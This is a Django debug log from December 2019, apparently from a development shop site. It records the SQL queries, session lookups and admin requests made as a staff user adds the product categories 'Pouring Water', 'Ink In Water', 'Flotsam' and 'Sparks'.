args=(6,) DEBUG 2019-12-13 13:12:21,981 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 5; args=(5,) DEBUG 2019-12-13 13:12:21,985 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 5 LIMIT 1; args=(5,) DEBUG 2019-12-13 13:12:21,987 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 5 AND "shop_category"."slug" = 'pouring-water') LIMIT 1; args=(5, 'pouring-water') DEBUG 2019-12-13 13:12:21,989 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Pouring Water' LIMIT 1; args=('Pouring Water',) DEBUG 2019-12-13 13:12:21,992 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Pouring Water' AND "shop_category"."parent_id" = 5) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Pouring Water', 5) DEBUG 2019-12-13 13:12:21,994 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 5; args=(5,) DEBUG 2019-12-13 13:12:21,995 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 8 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 8, 1, 1] DEBUG 2019-12-13 13:12:21,999 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Pouring Water', 5, 'categories/2019/12/13/collection5_J2Tl3z7.png', 'Pouring Water', false, 'pouring-water', 2, 3, 8, 1) RETURNING "shop_category"."id"; args=('Pouring Water', 5, 'categories/2019/12/13/collection5_J2Tl3z7.png', 'Pouring Water', False, 'pouring-water', 2, 3, 8, 1) DEBUG 2019-12-13 13:12:22,001 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:12:22.000345+00:00'::timestamptz, 6, 8, '32', 'Pouring Water', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 12, 22, 345, tzinfo=), 6, 8, '32', 'Pouring Water', 1, '[{"added": {}}]') [13/Dec/2019 13:12:22] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:12:22,303 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:12:22.290825+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 12, 22, 290825, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:12:22,308 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:12:22,366 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:12:22,488 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:12:22.486023+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 12, 22, 486023, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:12:22] "GET /shop/category/add/ HTTP/1.0" 200 8723 DEBUG 2019-12-13 13:12:22,851 utils 11259 139831317362432 (0.006) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:12:22.832064+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 12, 22, 832064, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:12:22,858 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:12:22] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:12:36,253 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:12:36.239247+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 12, 36, 239247, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:12:36,257 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:12:36,265 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 5; args=(5,) DEBUG 2019-12-13 13:12:36,271 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 5 LIMIT 1; args=(5,) DEBUG 2019-12-13 13:12:36,276 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 5 AND "shop_category"."slug" = 'ink-water') LIMIT 1; args=(5, 'ink-water') DEBUG 2019-12-13 13:12:36,280 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Ink In Water' LIMIT 1; args=('Ink In Water',) DEBUG 2019-12-13 13:12:36,286 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Ink In Water' AND "shop_category"."parent_id" = 5) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Ink In Water', 5) DEBUG 2019-12-13 13:12:36,290 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 5; args=(5,) DEBUG 2019-12-13 13:12:36,293 utils 11259 139831317362432 (0.002) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 8 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 8, 1, 1] DEBUG 2019-12-13 13:12:36,299 utils 11259 139831317362432 (0.002) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Ink In Water', 5, 'categories/2019/12/13/collection5_DOY3fSw.png', 'Ink In Water', false, 'ink-water', 2, 3, 8, 1) RETURNING "shop_category"."id"; args=('Ink In Water', 5, 'categories/2019/12/13/collection5_DOY3fSw.png', 'Ink In Water', False, 'ink-water', 2, 3, 8, 1) DEBUG 2019-12-13 13:12:36,302 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:12:36.300167+00:00'::timestamptz, 6, 8, '33', 'Ink In Water', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 12, 36, 300167, tzinfo=), 6, 8, '33', 'Ink In Water', 1, '[{"added": {}}]') [13/Dec/2019 13:12:36] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:12:36,602 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:12:36.592523+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 12, 36, 592523, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:12:36,605 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:12:36,664 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:12:36,714 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:12:36.712463+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 12, 36, 712463, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:12:36] "GET /shop/category/add/ HTTP/1.0" 200 8770 DEBUG 2019-12-13 13:12:37,092 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:12:37.075486+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 12, 37, 75486, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:12:37,098 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:12:37] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:12:55,656 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:12:55.645624+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 12, 55, 645624, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:12:55,659 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:12:55,668 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 5; args=(5,) DEBUG 2019-12-13 13:12:55,672 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 5 LIMIT 1; args=(5,) DEBUG 2019-12-13 13:12:55,674 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 5 AND "shop_category"."slug" = 'flotsam') LIMIT 1; args=(5, 'flotsam') DEBUG 2019-12-13 13:12:55,675 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Flotsam' LIMIT 1; args=('Flotsam',) DEBUG 2019-12-13 13:12:55,679 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Flotsam' AND "shop_category"."parent_id" = 5) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Flotsam', 5) DEBUG 2019-12-13 13:12:55,681 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 5; args=(5,) DEBUG 2019-12-13 13:12:55,683 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 8 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 8, 1, 1] DEBUG 2019-12-13 13:12:55,686 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Flotsam', 5, 'categories/2019/12/13/collection5_NjJaGxE.png', 'Flotsam', false, 'flotsam', 2, 3, 8, 1) RETURNING "shop_category"."id"; args=('Flotsam', 5, 'categories/2019/12/13/collection5_NjJaGxE.png', 'Flotsam', False, 'flotsam', 2, 3, 8, 1) DEBUG 2019-12-13 13:12:55,688 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:12:55.687001+00:00'::timestamptz, 6, 8, '34', 'Flotsam', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 12, 55, 687001, tzinfo=), 6, 8, '34', 'Flotsam', 1, '[{"added": {}}]') [13/Dec/2019 13:12:55] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:12:55,990 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:12:55.979921+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 12, 55, 979921, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:12:55,995 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:12:56,074 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:12:56,147 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:12:56.144627+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 12, 56, 144627, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:12:56] "GET /shop/category/add/ HTTP/1.0" 200 8808 DEBUG 2019-12-13 13:12:56,507 utils 11259 139831317362432 (0.006) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:12:56.489703+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 12, 56, 489703, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:12:56,513 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:12:56] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:13:45,869 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:13:45.858344+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 13, 45, 858344, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:13:45,874 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:13:45,882 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 7; args=(7,) DEBUG 2019-12-13 13:13:45,886 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 7 LIMIT 1; args=(7,) DEBUG 2019-12-13 13:13:45,889 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 7 AND "shop_category"."slug" = 'sparks') LIMIT 1; args=(7, 'sparks') DEBUG 2019-12-13 13:13:45,890 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Sparks' LIMIT 1; args=('Sparks',) DEBUG 2019-12-13 13:13:45,893 utils 11259 139831317362432 (0.001) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(7,) DEBUG 2019-12-13 13:13:45,895 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 5 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 5, 1, 1] DEBUG 2019-12-13 13:13:45,899 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Sparks', 7, 'categories/2019/12/13/collection7.png', 'Sparks', false, 'sparks', 2, 3, 5, 1) RETURNING "shop_category"."id"; args=('Sparks', 7, 'categories/2019/12/13/collection7.png', 'Sparks', False, 'sparks', 2, 3, 5, 1) DEBUG 2019-12-13 13:13:45,901 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:13:45.899720+00:00'::timestamptz, 6, 8, '35', 'Sparks', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 13, 45, 899720, tzinfo=), 6, 8, '35', 'Sparks', 1, '[{"added": {}}]') [13/Dec/2019 13:13:45] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:13:46,216 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:13:46.202760+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 13, 46, 202760, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:13:46,221 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:13:46,341 utils 11259 139831317362432 (0.014) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:13:46,413 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:13:46.411622+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 13, 46, 411622, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:13:46] "GET /shop/category/add/ HTTP/1.0" 200 8849 DEBUG 2019-12-13 13:13:46,781 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:13:46.770204+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 13, 46, 770204, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:13:46,786 utils 11259 